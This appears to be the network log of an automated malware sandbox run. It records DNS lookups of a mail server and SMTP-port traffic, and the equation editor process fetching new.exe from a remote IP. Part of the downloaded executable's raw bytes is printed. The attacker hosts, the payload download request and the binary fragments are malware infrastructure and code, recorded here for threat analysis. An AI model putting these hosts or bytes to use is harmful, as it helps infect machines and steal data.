Jan 13, 2021 20:44:23.247922897 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.249341011 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.249608994 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.249881983 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.250171900 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.256381989 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.327980995 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.328012943 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.328231096 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.328282118 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.328356028 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.328600883 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.334990978 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.335140944 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.406944990 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.406965971 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.407233953 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.413717031 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.413738966 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.413847923 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.485807896 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.485831022 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.485850096 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.485928059 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.485960007 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.492425919 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.492446899 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.492460966 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.492532969 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.492566109 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.564753056 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.564780951 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.564805984 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.564830065 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.565120935 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.571271896 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.571300983 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.571325064 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.571418047 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.571576118 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.572380066 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.644047022 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.644073963 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.644098043 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.644999981 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.645025969 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.645047903 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.646089077 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.646636009 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.646846056 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.647057056 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.647274971 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:23.650357962 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.650386095 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.650834084 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.651016951 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.651228905 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.651391983 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.651549101 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.724723101 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.724744081 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.724951029 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.725056887 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.725394964 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.725419044 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.726047993 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.766393900 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:23.982409954 CET	49174	587	192.168.2.22	217.174.152.38
Jan 13, 2021 20:44:24.047167063 CET	587	49174	217.174.152.38	192.168.2.22
Jan 13, 2021 20:44:24.047352076 CET	49174	587	192.168.2.22	217.174.152.38

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 20:43:34.206883907 CET	52197	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:34.365825891 CET	53	52197	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:34.406476974 CET	53099	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:34.561983109 CET	53	53099	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:35.734723091 CET	52838	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:35.794058084 CET	53	52838	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:35.807879925 CET	61200	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:35.855926037 CET	53	61200	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:36.447720051 CET	49548	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:36.496004105 CET	53	49548	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:36.510776043 CET	55627	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:36.572196960 CET	53	55627	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:36.573141098 CET	55627	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:36.630517960 CET	53	55627	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:46.376554966 CET	56009	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:46.436955929 CET	53	56009	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:46.437974930 CET	56009	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:46.515703917 CET	53	56009	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:46.549091101 CET	61865	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:46.610347986 CET	53	61865	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:59.547009945 CET	55171	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:59.606236935 CET	53	55171	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:59.606689930 CET	55171	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:59.665968895 CET	53	55171	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:59.703999043 CET	52496	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:59.759926081 CET	53	52496	8.8.8.8	192.168.2.22
Jan 13, 2021 20:43:59.760759115 CET	52496	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:43:59.808614016 CET	53	52496	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:10.778553009 CET	57564	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:10.835068941 CET	53	57564	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:10.836003065 CET	57564	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:10.892323017 CET	53	57564	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:10.893451929 CET	57564	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:10.949981928 CET	53	57564	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:10.951000929 CET	57564	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:11.009556055 CET	53	57564	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:11.056170940 CET	63009	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:11.112289906 CET	53	63009	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:22.020467043 CET	59319	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:22.087548018 CET	53	59319	8.8.8.8	192.168.2.22
Jan 13, 2021 20:44:22.126532078 CET	53070	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:44:22.174501896 CET	53	53070	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 20:43:34.206883907 CET	192.168.2.22	8.8.8.8	0xfd76	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:34.406476974 CET	192.168.2.22	8.8.8.8	0xd5e3	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.376554966 CET	192.168.2.22	8.8.8.8	0x8b56	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.437974930 CET	192.168.2.22	8.8.8.8	0x8b56	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.549091101 CET	192.168.2.22	8.8.8.8	0xe6d3	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.547009945 CET	192.168.2.22	8.8.8.8	0x5d3c	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.606689930 CET	192.168.2.22	8.8.8.8	0x5d3c	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.703999043 CET	192.168.2.22	8.8.8.8	0x8c6f	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.760759115 CET	192.168.2.22	8.8.8.8	0x8c6f	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.778553009 CET	192.168.2.22	8.8.8.8	0x9e7e	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.836003065 CET	192.168.2.22	8.8.8.8	0x9e7e	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.893451929 CET	192.168.2.22	8.8.8.8	0x9e7e	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.951000929 CET	192.168.2.22	8.8.8.8	0x9e7e	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:11.056170940 CET	192.168.2.22	8.8.8.8	0x7350	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:22.020467043 CET	192.168.2.22	8.8.8.8	0x1780	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:22.126532078 CET	192.168.2.22	8.8.8.8	0xf21b	Standard query (0)	mail.gammavilla.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 20:43:34.365825891 CET	8.8.8.8	192.168.2.22	0xfd76	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:34.365825891 CET	8.8.8.8	192.168.2.22	0xfd76	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:34.561983109 CET	8.8.8.8	192.168.2.22	0xd5e3	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:34.561983109 CET	8.8.8.8	192.168.2.22	0xd5e3	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.436955929 CET	8.8.8.8	192.168.2.22	0x8b56	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:46.436955929 CET	8.8.8.8	192.168.2.22	0x8b56	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.515703917 CET	8.8.8.8	192.168.2.22	0x8b56	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:46.515703917 CET	8.8.8.8	192.168.2.22	0x8b56	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:46.610347986 CET	8.8.8.8	192.168.2.22	0xe6d3	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:46.610347986 CET	8.8.8.8	192.168.2.22	0xe6d3	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.606236935 CET	8.8.8.8	192.168.2.22	0x5d3c	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:59.606236935 CET	8.8.8.8	192.168.2.22	0x5d3c	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.665968895 CET	8.8.8.8	192.168.2.22	0x5d3c	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:59.665968895 CET	8.8.8.8	192.168.2.22	0x5d3c	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.759926081 CET	8.8.8.8	192.168.2.22	0x8c6f	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:59.759926081 CET	8.8.8.8	192.168.2.22	0x8c6f	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:43:59.808614016 CET	8.8.8.8	192.168.2.22	0x8c6f	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:43:59.808614016 CET	8.8.8.8	192.168.2.22	0x8c6f	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.835068941 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:10.835068941 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.892323017 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:10.892323017 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:10.949981928 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:10.949981928 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:11.009556055 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:11.009556055 CET	8.8.8.8	192.168.2.22	0x9e7e	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:11.112289906 CET	8.8.8.8	192.168.2.22	0x7350	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:11.112289906 CET	8.8.8.8	192.168.2.22	0x7350	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:22.087548018 CET	8.8.8.8	192.168.2.22	0x1780	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:22.087548018 CET	8.8.8.8	192.168.2.22	0x1780	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)
Jan 13, 2021 20:44:22.174501896 CET	8.8.8.8	192.168.2.22	0xf21b	No error (0)	mail.gammavilla.org	gammavilla.org		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:44:22.174501896 CET	8.8.8.8	192.168.2.22	0xf21b	No error (0)	gammavilla.org		217.174.152.38	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

191.96.149.225

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	191.96.149.225	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:42:44.916251898 CET	0	OUT	GET /new.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 191.96.149.225 Connection: Keep-Alive
Jan 13, 2021 20:42:45.084038019 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 13 Jan 2021 19:42:45 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0 Last-Modified: Wed, 13 Jan 2021 16:41:58 GMT ETag: "c6400-5b8cad158905f" Accept-Ranges: bytes Content-Length: 812032 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 99 b4 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 5a 0c 00 00 08 00 00 00 00 00 00 8e 79 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 79 0c 00 4f 00 00 00 00 80 0c 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0c 00 0c 00 00 00 20 79 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 59 0c 00 00 20 00 00 00 5a 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 80 0c 00 00 06 00 00 00 5c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0c 00 00 02 00 00 00 62 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 79 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 ca 00 00 5c 80 00 00 03 00 00 00 4b 00 00 06 40 4b 01 00 e0 2d 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 42 00 00 00 01 00 00 11 00 73 15 00 00 0a 0a 06 16 16 02 28 16 00 00 0a 0b 12 01 28 17 00 00 0a 02 28 16 00 00 0a 0b 12 01 28 18 00 00 0a 6f 19 00 00 0a 00 02 06 73 1a 00 00 0a 28 1b 00 00 0a 00 02 03 28 1c 00 00 0a 00 2a 22 02 28 1d 00 00 0a 00 2a 00 1b 30 05 00 07 01 00 00 02 00 00 11 00 16 0a 00 72 01 00 00 70 0b 07 28 1e 00 00 0a 0d 09 39 e0 00 00 00 00 07 19 17 19 73 1f 00 00 0a 13 04 11 04 73 20 00 00 0a 13 05 00 38 9f 00 00 00 00 08 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 00 0a 13 06 11 06 16 9a 6f 22 00 00 0a 72 69 00 00 70 28 23 00 00 0a 13 07 11 07 2c 71 00 11 06 17 9a 6f 22 00 00 0a 02 28 23 00 00 0a 13 08 11 08 2c 5a 00 2b 3a 00 08 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 00 0a 13 09 11 09 16 9a 6f 22 00 00 0a 72 7b 00 00 70 28 23 00 00 0a 13 0a 11 0a 2c 0c 11 09 17 9a 12 00 28 24 00 00 0a 26 00 11 05 6f 25 00 00 0a 25 0c 72 87 00 00 70 6f 26 00 00 0a 16 fe 01 13 0b 11 0b 2d aa 00 00 00 11 05 6f 25 00 00 0a 25 0c 14 fe 03 13 0c 11 0c 3a 4c ff ff ff 00 de 05 26 00 00 de 00 11 05 6f 27 00 00 0a 00 00 00 de 05 26 00 00 de 00 06 13 0d 2b 00 11 0d 2a 00 01 1c 00 00 00 00 2c 00 bd e9 00 05 14 00 00 01 00 00 03 00 f7 fa 00 05 14 00 00 01 1b 30 05 00 a3 01 00 00 03 00 00 11 00 73 28 00 00 0a 0a 72 8b 00 00 70 0b Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0Zy @ @<yO y H.textY Z `.rsrc\@@.relocb@BpyH\K@K-0Bs((((os(("(0rp(9ss 8a%=o!o"rip(#,qo"(#,Z+:a%=o!o"r{p(#,($&o%%rpo&-o%%:L&o'&+*,0s(rp
Jan 13, 2021 20:42:45.084103107 CET	3	IN	Data Raw: 72 8d 00 00 70 28 29 00 00 0a 0c 00 16 0d 38 5a 01 00 00 00 08 09 9a 13 04 11 04 72 69 00 00 70 6f 2a 00 00 0a 13 05 11 05 39 25 01 00 00 00 06 11 04 72 fb 00 00 70 28 2b 00 00 0a 6f 2c 00 00 0a 26 11 04 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 Data Ascii: rp()8Zripo*9%rp(+o,&a%=o!o"(#98rpo&,Y8a%=o!o"r{p(#,=($&rp(-(+o.
Jan 13, 2021 20:42:45.084141016 CET	4	IN	Data Raw: 1d 7e 06 00 00 04 a2 25 1e 72 ea 02 00 70 a2 28 52 00 00 0a 73 53 00 00 0a 0b 02 07 73 54 00 00 0a 0c 07 6f 55 00 00 0a 00 08 6f 56 00 00 0a 0d 00 2b 0f 00 09 16 6f 57 00 00 0a 6f 22 00 00 0a 0a 00 09 6f 58 00 00 0a 13 04 11 04 2d e5 00 de 0b 09 Data Ascii: ~%rp(RsSsToUoV+oWo"oX-,oYoZ+*w!0rpb%rp%%rp%%rp%%r$p%(Rb%rp%~%rp%~
Jan 13, 2021 20:42:45.084191084 CET	5	IN	Data Raw: 72 6c 05 00 70 6f 73 00 00 0a 00 02 02 fe 06 1a 00 00 06 73 74 00 00 0a 28 75 00 00 0a 00 02 7b 08 00 00 04 6f 76 00 00 0a 00 02 16 28 77 00 00 0a 00 2a 13 30 02 00 4e 00 00 00 00 00 00 00 02 7c 09 00 00 04 fe 15 0c 00 00 02 02 16 7d 0a 00 00 04 Data Ascii: rlposst(u{ov(w0N\|} '}}sI}}}(](.0r\|p(\|}.{(1os(M}\|{0}\|{.}
Jan 13, 2021 20:42:45.084249973 CET	7	IN	Data Raw: 00 04 6c 28 48 00 00 0a 28 49 00 00 0a 28 93 00 00 0a 13 04 12 04 28 95 00 00 0a 13 05 12 05 28 2d 00 00 0a 0a 7f 34 00 00 04 7e 32 00 00 04 6c 28 48 00 00 0a 28 49 00 00 0a 28 93 00 00 0a 13 04 12 04 28 96 00 00 0a 13 05 12 05 28 2d 00 00 0a 0b Data Ascii: l(H(I(((-4~2l(H(I(((-4~2l(H(I((,7rp4~2l(H(I(((-(+b%%r#p%%r#p%(R+*0
Jan 13, 2021 20:42:45.084291935 CET	8	IN	Data Raw: 02 7b 12 00 00 04 1b 73 a2 00 00 0a 6f a0 00 00 0a 00 02 7b 12 00 00 04 72 3f 08 00 70 6f 69 00 00 0a 00 02 7b 12 00 00 04 20 75 01 00 00 20 94 00 00 00 73 6a 00 00 0a 6f 61 00 00 0a 00 02 7b 12 00 00 04 1e 6f a1 00 00 0a 00 02 7b 12 00 00 04 72 Data Ascii: {so{r?poi{ u sjoa{o{r[pos{o{"sto{ sgoh{so{rspoi{ @sjoa{o{rpos
Jan 13, 2021 20:42:45.084332943 CET	10	IN	Data Raw: 00 02 7b 1b 00 00 04 72 5b 09 00 70 6f 69 00 00 0a 00 02 7b 1b 00 00 04 20 75 01 00 00 1f 43 73 6a 00 00 0a 6f 61 00 00 0a 00 02 7b 1b 00 00 04 1f 0e 6f a1 00 00 0a 00 02 7b 1b 00 00 04 72 81 09 00 70 6f 73 00 00 0a 00 02 7b 1b 00 00 04 16 6f a3 Data Ascii: {r[poi{ uCsjoa{o{rpos{o{+sto{ `o{)sto{ sgoh{so{rpoi{ sjoa{
Jan 13, 2021 20:42:45.084373951 CET	11	IN	Data Raw: 16 13 04 20 e0 8e fb 0e 13 05 11 05 20 c2 8e fb 0e fe 02 13 2d 11 2d 2c 09 20 cd 8e fb 0e 13 05 2b 1d 11 05 20 d9 8e fb 0e fe 02 16 fe 01 13 2e 11 2e 2c 08 11 05 17 58 13 05 2b 03 17 13 05 17 13 06 11 06 16 fe 01 13 2f 11 2f 2c 05 16 13 06 2b 12 Data Ascii: --, + ..,X+//,+%00,+ 11, + 22,X+ 33, + 44,X+ 55,
Jan 13, 2021 20:42:45.084403992 CET	13	IN	Data Raw: 13 22 11 22 14 19 8d 14 00 00 01 25 16 7e 5a 00 00 04 a2 25 17 7e 5b 00 00 04 a2 25 18 72 0d 0a 00 70 a2 6f b3 00 00 0a 26 2a ba 02 7c 1f 00 00 04 fe 15 0c 00 00 02 02 73 49 00 00 06 7d 20 00 00 04 02 14 7d 21 00 00 04 02 28 5d 00 00 0a 00 00 02 Data Ascii: ""%~Z%~[%rpo&\|sI} }!(](H(M}{-9so*0B\|{/{-o(#-'\|{/-{-or?p(#++9{-rpos
Jan 13, 2021 20:42:45.084434032 CET	14	IN	Data Raw: 7b 22 00 00 04 1f 30 6f a1 00 00 0a 00 02 7b 22 00 00 04 16 6f c8 00 00 0a 00 02 7b 22 00 00 04 72 85 0a 00 70 6f 73 00 00 0a 00 02 7b 22 00 00 04 16 6f a3 00 00 0a 00 02 7b 22 00 00 04 02 fe 06 45 00 00 06 73 74 00 00 0a 6f a4 00 00 0a 00 02 7b Data Ascii: {"0o{"o{"rpos{"o{"Esto{# (o{#o{#o{#oo{#o (o{#o (o{#o
Jan 13, 2021 20:42:45.250488997 CET	15	IN	Data Raw: 02 7b 26 00 00 04 1f 0c 20 2f 01 00 00 73 67 00 00 0a 6f 68 00 00 0a 00 02 7b 26 00 00 04 1a 73 a2 00 00 0a 6f a0 00 00 0a 00 02 7b 26 00 00 04 72 c1 0a 00 70 6f 69 00 00 0a 00 02 7b 26 00 00 04 1f 64 1f 64 73 6a 00 00 0a 6f 61 00 00 0a 00 02 7b Data Ascii: {& /sgoh{&so{&rpoi{&ddsjoa{&,o{&o{&rapos{&o{&Asto{' (o{'o{'o{'oo{'

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
